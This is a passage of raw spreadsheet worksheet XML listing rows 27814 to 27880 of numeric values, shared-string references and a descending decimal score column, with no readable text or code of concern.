      <c r="A27814" s="1">
        <v>5592.0</v>
      </c>
      <c r="B27814" s="2">
        <v>4.610101E7</v>
      </c>
      <c r="C27814" s="2" t="s">
        <v>26728</v>
      </c>
      <c r="D27814" s="2">
        <v>1.0</v>
      </c>
      <c r="E27814" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27814" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="27815" ht="15.75" customHeight="1">
      <c r="A27815" s="1">
        <v>19812.0</v>
      </c>
      <c r="B27815" s="2">
        <v>5.6928013E7</v>
      </c>
      <c r="C27815" s="2" t="s">
        <v>26729</v>
      </c>
      <c r="D27815" s="2">
        <v>1.0</v>
      </c>
      <c r="E27815" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27815" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="27816" ht="15.75" customHeight="1">
      <c r="A27816" s="1">
        <v>24021.0</v>
      </c>
      <c r="B27816" s="2">
        <v>9349974.0</v>
      </c>
      <c r="C27816" s="2" t="s">
        <v>26730</v>
      </c>
      <c r="D27816" s="2">
        <v>1.0</v>
      </c>
      <c r="E27816" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27816" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="27817" ht="15.75" customHeight="1">
      <c r="A27817" s="1">
        <v>25157.0</v>
      </c>
      <c r="B27817" s="2">
        <v>1.3065718E7</v>
      </c>
      <c r="C27817" s="2" t="s">
        <v>26731</v>
      </c>
      <c r="D27817" s="2">
        <v>1.0</v>
      </c>
      <c r="E27817" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27817" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="27818" ht="15.75" customHeight="1">
      <c r="A27818" s="1">
        <v>29014.0</v>
      </c>
      <c r="B27818" s="2">
        <v>3.0047217E7</v>
      </c>
      <c r="C27818" s="2" t="s">
        <v>26732</v>
      </c>
      <c r="D27818" s="2">
        <v>1.0</v>
      </c>
      <c r="E27818" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27818" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="27819" ht="15.75" customHeight="1">
      <c r="A27819" s="1">
        <v>30730.0</v>
      </c>
      <c r="B27819" s="2">
        <v>4.3946634E7</v>
      </c>
      <c r="C27819" s="2" t="s">
        <v>26733</v>
      </c>
      <c r="D27819" s="2">
        <v>1.0</v>
      </c>
      <c r="E27819" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27819" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="27820" ht="15.75" customHeight="1">
      <c r="A27820" s="1">
        <v>33032.0</v>
      </c>
      <c r="B27820" s="2">
        <v>6714581.0</v>
      </c>
      <c r="C27820" s="2" t="s">
        <v>26734</v>
      </c>
      <c r="D27820" s="2">
        <v>1.0</v>
      </c>
      <c r="E27820" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27820" s="2">
        <v>0.1457326892109501</v>
      </c>
    </row>
    <row r="27821" ht="15.75" customHeight="1">
      <c r="A27821" s="1">
        <v>2022.0</v>
      </c>
      <c r="B27821" s="2">
        <v>3.0769072E7</v>
      </c>
      <c r="C27821" s="2" t="s">
        <v>26735</v>
      </c>
      <c r="D27821" s="2">
        <v>1.0</v>
      </c>
      <c r="E27821" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27821" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="27822" ht="15.75" customHeight="1">
      <c r="A27822" s="1">
        <v>10573.0</v>
      </c>
      <c r="B27822" s="2">
        <v>1.2964169E7</v>
      </c>
      <c r="C27822" s="2" t="s">
        <v>26736</v>
      </c>
      <c r="D27822" s="2">
        <v>1.0</v>
      </c>
      <c r="E27822" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27822" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="27823" ht="15.75" customHeight="1">
      <c r="A27823" s="1">
        <v>748.0</v>
      </c>
      <c r="B27823" s="2">
        <v>2.0905493E7</v>
      </c>
      <c r="C27823" s="2" t="s">
        <v>26737</v>
      </c>
      <c r="D27823" s="2">
        <v>1.0</v>
      </c>
      <c r="E27823" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27823" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
    <row r="27824" ht="15.75" customHeight="1">
      <c r="A27824" s="1">
        <v>8716.0</v>
      </c>
      <c r="B27824" s="2">
        <v>5.4466374E7</v>
      </c>
      <c r="C27824" s="2" t="s">
        <v>26738</v>
      </c>
      <c r="D27824" s="2">
        <v>1.0</v>
      </c>
      <c r="E27824" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27824" s="2">
        <v>0.1452380952380953</v>
      </c>
    </row>
    <row r="27825" ht="15.75" customHeight="1">
      <c r="A27825" s="1">
        <v>3500.0</v>
      </c>
      <c r="B27825" s="2">
        <v>3.851284E7</v>
      </c>
      <c r="C27825" s="2" t="s">
        <v>26739</v>
      </c>
      <c r="D27825" s="2">
        <v>1.0</v>
      </c>
      <c r="E27825" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27825" s="2">
        <v>0.1452241715399611</v>
      </c>
    </row>
    <row r="27826" ht="15.75" customHeight="1">
      <c r="A27826" s="1">
        <v>30941.0</v>
      </c>
      <c r="B27826" s="2">
        <v>4.729685E7</v>
      </c>
      <c r="C27826" s="2" t="s">
        <v>26740</v>
      </c>
      <c r="D27826" s="2">
        <v>1.0</v>
      </c>
      <c r="E27826" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27826" s="2">
        <v>0.1452241715399611</v>
      </c>
    </row>
    <row r="27827" ht="15.75" customHeight="1">
      <c r="A27827" s="1">
        <v>6435.0</v>
      </c>
      <c r="B27827" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C27827" s="2" t="s">
        <v>26741</v>
      </c>
      <c r="D27827" s="2">
        <v>1.0</v>
      </c>
      <c r="E27827" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27827" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="27828" ht="15.75" customHeight="1">
      <c r="A27828" s="1">
        <v>17622.0</v>
      </c>
      <c r="B27828" s="2">
        <v>5.0375827E7</v>
      </c>
      <c r="C27828" s="2" t="s">
        <v>26742</v>
      </c>
      <c r="D27828" s="2">
        <v>1.0</v>
      </c>
      <c r="E27828" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27828" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="27829" ht="15.75" customHeight="1">
      <c r="A27829" s="1">
        <v>18625.0</v>
      </c>
      <c r="B27829" s="2">
        <v>5.3356852E7</v>
      </c>
      <c r="C27829" s="2" t="s">
        <v>26743</v>
      </c>
      <c r="D27829" s="2">
        <v>1.0</v>
      </c>
      <c r="E27829" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27829" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="27830" ht="15.75" customHeight="1">
      <c r="A27830" s="1">
        <v>10170.0</v>
      </c>
      <c r="B27830" s="2">
        <v>5.7360367E7</v>
      </c>
      <c r="C27830" s="2" t="s">
        <v>26744</v>
      </c>
      <c r="D27830" s="2">
        <v>1.0</v>
      </c>
      <c r="E27830" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27830" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="27831" ht="15.75" customHeight="1">
      <c r="A27831" s="1">
        <v>18300.0</v>
      </c>
      <c r="B27831" s="2">
        <v>5.2336771E7</v>
      </c>
      <c r="C27831" s="2" t="s">
        <v>26745</v>
      </c>
      <c r="D27831" s="2">
        <v>1.0</v>
      </c>
      <c r="E27831" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27831" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="27832" ht="15.75" customHeight="1">
      <c r="A27832" s="1">
        <v>12473.0</v>
      </c>
      <c r="B27832" s="2">
        <v>2.9447842E7</v>
      </c>
      <c r="C27832" s="2" t="s">
        <v>26746</v>
      </c>
      <c r="D27832" s="2">
        <v>1.0</v>
      </c>
      <c r="E27832" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27832" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="27833" ht="15.75" customHeight="1">
      <c r="A27833" s="1">
        <v>20113.0</v>
      </c>
      <c r="B27833" s="2">
        <v>4915650.0</v>
      </c>
      <c r="C27833" s="2" t="s">
        <v>26747</v>
      </c>
      <c r="D27833" s="2">
        <v>1.0</v>
      </c>
      <c r="E27833" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27833" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="27834" ht="15.75" customHeight="1">
      <c r="A27834" s="1">
        <v>23638.0</v>
      </c>
      <c r="B27834" s="2">
        <v>6669465.0</v>
      </c>
      <c r="C27834" s="2" t="s">
        <v>26748</v>
      </c>
      <c r="D27834" s="2">
        <v>1.0</v>
      </c>
      <c r="E27834" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27834" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="27835" ht="15.75" customHeight="1">
      <c r="A27835" s="1">
        <v>23971.0</v>
      </c>
      <c r="B27835" s="2">
        <v>9061792.0</v>
      </c>
      <c r="C27835" s="2" t="s">
        <v>26749</v>
      </c>
      <c r="D27835" s="2">
        <v>1.0</v>
      </c>
      <c r="E27835" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27835" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="27836" ht="15.75" customHeight="1">
      <c r="A27836" s="1">
        <v>27725.0</v>
      </c>
      <c r="B27836" s="2">
        <v>2.3063025E7</v>
      </c>
      <c r="C27836" s="2" t="s">
        <v>26750</v>
      </c>
      <c r="D27836" s="2">
        <v>1.0</v>
      </c>
      <c r="E27836" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27836" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="27837" ht="15.75" customHeight="1">
      <c r="A27837" s="1">
        <v>18978.0</v>
      </c>
      <c r="B27837" s="2">
        <v>5.4385597E7</v>
      </c>
      <c r="C27837" s="2" t="s">
        <v>26751</v>
      </c>
      <c r="D27837" s="2">
        <v>1.0</v>
      </c>
      <c r="E27837" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27837" s="2">
        <v>0.1435185185185185</v>
      </c>
    </row>
    <row r="27838" ht="15.75" customHeight="1">
      <c r="A27838" s="1">
        <v>23257.0</v>
      </c>
      <c r="B27838" s="2">
        <v>5.3160933E7</v>
      </c>
      <c r="C27838" s="2" t="s">
        <v>26752</v>
      </c>
      <c r="D27838" s="2">
        <v>1.0</v>
      </c>
      <c r="E27838" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27838" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="27839" ht="15.75" customHeight="1">
      <c r="A27839" s="1">
        <v>23268.0</v>
      </c>
      <c r="B27839" s="2">
        <v>5329042.0</v>
      </c>
      <c r="C27839" s="2" t="s">
        <v>26753</v>
      </c>
      <c r="D27839" s="2">
        <v>1.0</v>
      </c>
      <c r="E27839" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27839" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="27840" ht="15.75" customHeight="1">
      <c r="A27840" s="1">
        <v>5802.0</v>
      </c>
      <c r="B27840" s="2">
        <v>4.6784675E7</v>
      </c>
      <c r="C27840" s="2" t="s">
        <v>26754</v>
      </c>
      <c r="D27840" s="2">
        <v>1.0</v>
      </c>
      <c r="E27840" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27840" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="27841" ht="15.75" customHeight="1">
      <c r="A27841" s="1">
        <v>13617.0</v>
      </c>
      <c r="B27841" s="2">
        <v>3.5857178E7</v>
      </c>
      <c r="C27841" s="2" t="s">
        <v>26755</v>
      </c>
      <c r="D27841" s="2">
        <v>1.0</v>
      </c>
      <c r="E27841" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27841" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="27842" ht="15.75" customHeight="1">
      <c r="A27842" s="1">
        <v>15374.0</v>
      </c>
      <c r="B27842" s="2">
        <v>4.2738977E7</v>
      </c>
      <c r="C27842" s="2" t="s">
        <v>26756</v>
      </c>
      <c r="D27842" s="2">
        <v>1.0</v>
      </c>
      <c r="E27842" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27842" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="27843" ht="15.75" customHeight="1">
      <c r="A27843" s="1">
        <v>20378.0</v>
      </c>
      <c r="B27843" s="2">
        <v>1.1866926E7</v>
      </c>
      <c r="C27843" s="2" t="s">
        <v>26757</v>
      </c>
      <c r="D27843" s="2">
        <v>1.0</v>
      </c>
      <c r="E27843" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27843" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="27844" ht="15.75" customHeight="1">
      <c r="A27844" s="1">
        <v>25634.0</v>
      </c>
      <c r="B27844" s="2">
        <v>1.4473908E7</v>
      </c>
      <c r="C27844" s="2" t="s">
        <v>26758</v>
      </c>
      <c r="D27844" s="2">
        <v>1.0</v>
      </c>
      <c r="E27844" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27844" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="27845" ht="15.75" customHeight="1">
      <c r="A27845" s="1">
        <v>26806.0</v>
      </c>
      <c r="B27845" s="2">
        <v>1.8672579E7</v>
      </c>
      <c r="C27845" s="2" t="s">
        <v>26759</v>
      </c>
      <c r="D27845" s="2">
        <v>1.0</v>
      </c>
      <c r="E27845" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27845" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="27846" ht="15.75" customHeight="1">
      <c r="A27846" s="1">
        <v>30945.0</v>
      </c>
      <c r="B27846" s="2">
        <v>4.7318296E7</v>
      </c>
      <c r="C27846" s="2" t="s">
        <v>26740</v>
      </c>
      <c r="D27846" s="2">
        <v>1.0</v>
      </c>
      <c r="E27846" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27846" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="27847" ht="15.75" customHeight="1">
      <c r="A27847" s="1">
        <v>27968.0</v>
      </c>
      <c r="B27847" s="2">
        <v>2.3946142E7</v>
      </c>
      <c r="C27847" s="2" t="s">
        <v>26760</v>
      </c>
      <c r="D27847" s="2">
        <v>1.0</v>
      </c>
      <c r="E27847" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27847" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="27848" ht="15.75" customHeight="1">
      <c r="A27848" s="1">
        <v>29892.0</v>
      </c>
      <c r="B27848" s="2">
        <v>3607013.0</v>
      </c>
      <c r="C27848" s="2" t="s">
        <v>26761</v>
      </c>
      <c r="D27848" s="2">
        <v>1.0</v>
      </c>
      <c r="E27848" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27848" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="27849" ht="15.75" customHeight="1">
      <c r="A27849" s="1">
        <v>24776.0</v>
      </c>
      <c r="B27849" s="2">
        <v>1.1881176E7</v>
      </c>
      <c r="C27849" s="2" t="s">
        <v>26704</v>
      </c>
      <c r="D27849" s="2">
        <v>1.0</v>
      </c>
      <c r="E27849" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27849" s="2">
        <v>0.1430041152263375</v>
      </c>
    </row>
    <row r="27850" ht="15.75" customHeight="1">
      <c r="A27850" s="1">
        <v>23391.0</v>
      </c>
      <c r="B27850" s="2">
        <v>5.568264E7</v>
      </c>
      <c r="C27850" s="2" t="s">
        <v>26762</v>
      </c>
      <c r="D27850" s="2">
        <v>1.0</v>
      </c>
      <c r="E27850" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27850" s="2">
        <v>0.1429872495446266</v>
      </c>
    </row>
    <row r="27851" ht="15.75" customHeight="1">
      <c r="A27851" s="1">
        <v>278.0</v>
      </c>
      <c r="B27851" s="2">
        <v>1.5310621E7</v>
      </c>
      <c r="C27851" s="2" t="s">
        <v>26763</v>
      </c>
      <c r="D27851" s="2">
        <v>1.0</v>
      </c>
      <c r="E27851" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27851" s="2">
        <v>0.1429738562091504</v>
      </c>
    </row>
    <row r="27852" ht="15.75" customHeight="1">
      <c r="A27852" s="1">
        <v>19320.0</v>
      </c>
      <c r="B27852" s="2">
        <v>5.5307098E7</v>
      </c>
      <c r="C27852" s="2" t="s">
        <v>26764</v>
      </c>
      <c r="D27852" s="2">
        <v>1.0</v>
      </c>
      <c r="E27852" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27852" s="2">
        <v>0.1424731182795699</v>
      </c>
    </row>
    <row r="27853" ht="15.75" customHeight="1">
      <c r="A27853" s="1">
        <v>30349.0</v>
      </c>
      <c r="B27853" s="2">
        <v>3.8243058E7</v>
      </c>
      <c r="C27853" s="2" t="s">
        <v>26765</v>
      </c>
      <c r="D27853" s="2">
        <v>1.0</v>
      </c>
      <c r="E27853" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27853" s="2">
        <v>0.1422558922558923</v>
      </c>
    </row>
    <row r="27854" ht="15.75" customHeight="1">
      <c r="A27854" s="1">
        <v>20961.0</v>
      </c>
      <c r="B27854" s="2">
        <v>1.6693702E7</v>
      </c>
      <c r="C27854" s="2" t="s">
        <v>26720</v>
      </c>
      <c r="D27854" s="2">
        <v>1.0</v>
      </c>
      <c r="E27854" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27854" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="27855" ht="15.75" customHeight="1">
      <c r="A27855" s="1">
        <v>29933.0</v>
      </c>
      <c r="B27855" s="2">
        <v>3607053.0</v>
      </c>
      <c r="C27855" s="2" t="s">
        <v>26766</v>
      </c>
      <c r="D27855" s="2">
        <v>1.0</v>
      </c>
      <c r="E27855" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27855" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="27856" ht="15.75" customHeight="1">
      <c r="A27856" s="1">
        <v>18507.0</v>
      </c>
      <c r="B27856" s="2">
        <v>5.2977187E7</v>
      </c>
      <c r="C27856" s="2" t="s">
        <v>26767</v>
      </c>
      <c r="D27856" s="2">
        <v>1.0</v>
      </c>
      <c r="E27856" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27856" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="27857" ht="15.75" customHeight="1">
      <c r="A27857" s="1">
        <v>18979.0</v>
      </c>
      <c r="B27857" s="2">
        <v>5.4385597E7</v>
      </c>
      <c r="C27857" s="2" t="s">
        <v>26768</v>
      </c>
      <c r="D27857" s="2">
        <v>1.0</v>
      </c>
      <c r="E27857" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27857" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="27858" ht="15.75" customHeight="1">
      <c r="A27858" s="1">
        <v>4638.0</v>
      </c>
      <c r="B27858" s="2">
        <v>4.3008433E7</v>
      </c>
      <c r="C27858" s="2" t="s">
        <v>26769</v>
      </c>
      <c r="D27858" s="2">
        <v>1.0</v>
      </c>
      <c r="E27858" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27858" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="27859" ht="15.75" customHeight="1">
      <c r="A27859" s="1">
        <v>26094.0</v>
      </c>
      <c r="B27859" s="2">
        <v>1.56995E7</v>
      </c>
      <c r="C27859" s="2" t="s">
        <v>26770</v>
      </c>
      <c r="D27859" s="2">
        <v>1.0</v>
      </c>
      <c r="E27859" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27859" s="2">
        <v>0.1414814814814815</v>
      </c>
    </row>
    <row r="27860" ht="15.75" customHeight="1">
      <c r="A27860" s="1">
        <v>6208.0</v>
      </c>
      <c r="B27860" s="2">
        <v>4.7981677E7</v>
      </c>
      <c r="C27860" s="2" t="s">
        <v>26771</v>
      </c>
      <c r="D27860" s="2">
        <v>1.0</v>
      </c>
      <c r="E27860" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27860" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="27861" ht="15.75" customHeight="1">
      <c r="A27861" s="1">
        <v>11899.0</v>
      </c>
      <c r="B27861" s="2">
        <v>2.5174645E7</v>
      </c>
      <c r="C27861" s="2" t="s">
        <v>26772</v>
      </c>
      <c r="D27861" s="2">
        <v>1.0</v>
      </c>
      <c r="E27861" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27861" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="27862" ht="15.75" customHeight="1">
      <c r="A27862" s="1">
        <v>24767.0</v>
      </c>
      <c r="B27862" s="2">
        <v>1.1866925E7</v>
      </c>
      <c r="C27862" s="2" t="s">
        <v>26757</v>
      </c>
      <c r="D27862" s="2">
        <v>1.0</v>
      </c>
      <c r="E27862" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27862" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="27863" ht="15.75" customHeight="1">
      <c r="A27863" s="1">
        <v>26458.0</v>
      </c>
      <c r="B27863" s="2">
        <v>1.731204E7</v>
      </c>
      <c r="C27863" s="2" t="s">
        <v>26773</v>
      </c>
      <c r="D27863" s="2">
        <v>1.0</v>
      </c>
      <c r="E27863" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27863" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="27864" ht="15.75" customHeight="1">
      <c r="A27864" s="1">
        <v>11271.0</v>
      </c>
      <c r="B27864" s="2">
        <v>2.0725336E7</v>
      </c>
      <c r="C27864" s="2" t="s">
        <v>26774</v>
      </c>
      <c r="D27864" s="2">
        <v>1.0</v>
      </c>
      <c r="E27864" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27864" s="2">
        <v>0.1411657559198543</v>
      </c>
    </row>
    <row r="27865" ht="15.75" customHeight="1">
      <c r="A27865" s="1">
        <v>1897.0</v>
      </c>
      <c r="B27865" s="2">
        <v>2.9872177E7</v>
      </c>
      <c r="C27865" s="2" t="s">
        <v>26775</v>
      </c>
      <c r="D27865" s="2">
        <v>1.0</v>
      </c>
      <c r="E27865" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27865" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="27866" ht="15.75" customHeight="1">
      <c r="A27866" s="1">
        <v>11537.0</v>
      </c>
      <c r="B27866" s="2">
        <v>2.2584786E7</v>
      </c>
      <c r="C27866" s="2" t="s">
        <v>26776</v>
      </c>
      <c r="D27866" s="2">
        <v>1.0</v>
      </c>
      <c r="E27866" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27866" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="27867" ht="15.75" customHeight="1">
      <c r="A27867" s="1">
        <v>26515.0</v>
      </c>
      <c r="B27867" s="2">
        <v>1.763254E7</v>
      </c>
      <c r="C27867" s="2" t="s">
        <v>26777</v>
      </c>
      <c r="D27867" s="2">
        <v>1.0</v>
      </c>
      <c r="E27867" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27867" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="27868" ht="15.75" customHeight="1">
      <c r="A27868" s="1">
        <v>24653.0</v>
      </c>
      <c r="B27868" s="2">
        <v>1.1512449E7</v>
      </c>
      <c r="C27868" s="2" t="s">
        <v>26778</v>
      </c>
      <c r="D27868" s="2">
        <v>1.0</v>
      </c>
      <c r="E27868" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27868" s="2">
        <v>0.1409465020576131</v>
      </c>
    </row>
    <row r="27869" ht="15.75" customHeight="1">
      <c r="A27869" s="1">
        <v>998.0</v>
      </c>
      <c r="B27869" s="2">
        <v>2.2931425E7</v>
      </c>
      <c r="C27869" s="2" t="s">
        <v>26779</v>
      </c>
      <c r="D27869" s="2">
        <v>1.0</v>
      </c>
      <c r="E27869" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27869" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="27870" ht="15.75" customHeight="1">
      <c r="A27870" s="1">
        <v>1983.0</v>
      </c>
      <c r="B27870" s="2">
        <v>3.0484167E7</v>
      </c>
      <c r="C27870" s="2" t="s">
        <v>26780</v>
      </c>
      <c r="D27870" s="2">
        <v>1.0</v>
      </c>
      <c r="E27870" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27870" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="27871" ht="15.75" customHeight="1">
      <c r="A27871" s="1">
        <v>8045.0</v>
      </c>
      <c r="B27871" s="2">
        <v>5.2845408E7</v>
      </c>
      <c r="C27871" s="2" t="s">
        <v>26781</v>
      </c>
      <c r="D27871" s="2">
        <v>1.0</v>
      </c>
      <c r="E27871" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27871" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="27872" ht="15.75" customHeight="1">
      <c r="A27872" s="1">
        <v>11693.0</v>
      </c>
      <c r="B27872" s="2">
        <v>2.3458481E7</v>
      </c>
      <c r="C27872" s="2" t="s">
        <v>26782</v>
      </c>
      <c r="D27872" s="2">
        <v>1.0</v>
      </c>
      <c r="E27872" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27872" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="27873" ht="15.75" customHeight="1">
      <c r="A27873" s="1">
        <v>16640.0</v>
      </c>
      <c r="B27873" s="2">
        <v>4.7137979E7</v>
      </c>
      <c r="C27873" s="2" t="s">
        <v>26783</v>
      </c>
      <c r="D27873" s="2">
        <v>1.0</v>
      </c>
      <c r="E27873" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27873" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="27874" ht="15.75" customHeight="1">
      <c r="A27874" s="1">
        <v>21813.0</v>
      </c>
      <c r="B27874" s="2">
        <v>2.6858153E7</v>
      </c>
      <c r="C27874" s="2" t="s">
        <v>26784</v>
      </c>
      <c r="D27874" s="2">
        <v>1.0</v>
      </c>
      <c r="E27874" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27874" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="27875" ht="15.75" customHeight="1">
      <c r="A27875" s="1">
        <v>24023.0</v>
      </c>
      <c r="B27875" s="2">
        <v>9363214.0</v>
      </c>
      <c r="C27875" s="2" t="s">
        <v>26785</v>
      </c>
      <c r="D27875" s="2">
        <v>1.0</v>
      </c>
      <c r="E27875" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27875" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="27876" ht="15.75" customHeight="1">
      <c r="A27876" s="1">
        <v>28543.0</v>
      </c>
      <c r="B27876" s="2">
        <v>2.6858152E7</v>
      </c>
      <c r="C27876" s="2" t="s">
        <v>26786</v>
      </c>
      <c r="D27876" s="2">
        <v>1.0</v>
      </c>
      <c r="E27876" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27876" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="27877" ht="15.75" customHeight="1">
      <c r="A27877" s="1">
        <v>29570.0</v>
      </c>
      <c r="B27877" s="2">
        <v>3.3265756E7</v>
      </c>
      <c r="C27877" s="2" t="s">
        <v>26787</v>
      </c>
      <c r="D27877" s="2">
        <v>1.0</v>
      </c>
      <c r="E27877" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27877" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="27878" ht="15.75" customHeight="1">
      <c r="A27878" s="1">
        <v>11997.0</v>
      </c>
      <c r="B27878" s="2">
        <v>2.5929269E7</v>
      </c>
      <c r="C27878" s="2" t="s">
        <v>26788</v>
      </c>
      <c r="D27878" s="2">
        <v>1.0</v>
      </c>
      <c r="E27878" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27878" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="27879" ht="15.75" customHeight="1">
      <c r="A27879" s="1">
        <v>18546.0</v>
      </c>
      <c r="B27879" s="2">
        <v>5.3123121E7</v>
      </c>
      <c r="C27879" s="2" t="s">
        <v>26789</v>
      </c>
      <c r="D27879" s="2">
        <v>1.0</v>
      </c>
      <c r="E27879" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27879" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="27880" ht="15.75" customHeight="1">
      <c r="A27880" s="1">
        <v>19627.0</v>
      </c>
      <c r="B27880" s="2">
        <v>5.6272257E7</v>
      </c>
      <c r="C27880" s="2" t="s">
        <v>26790</v>
      </c>
      <c r="D27880" s="2">
        <v>1.0</v>
      </c>
      <c r="E27880" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27880" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="27881" ht="15.75" customHeight="1">
      <c r="A27881" s="1">
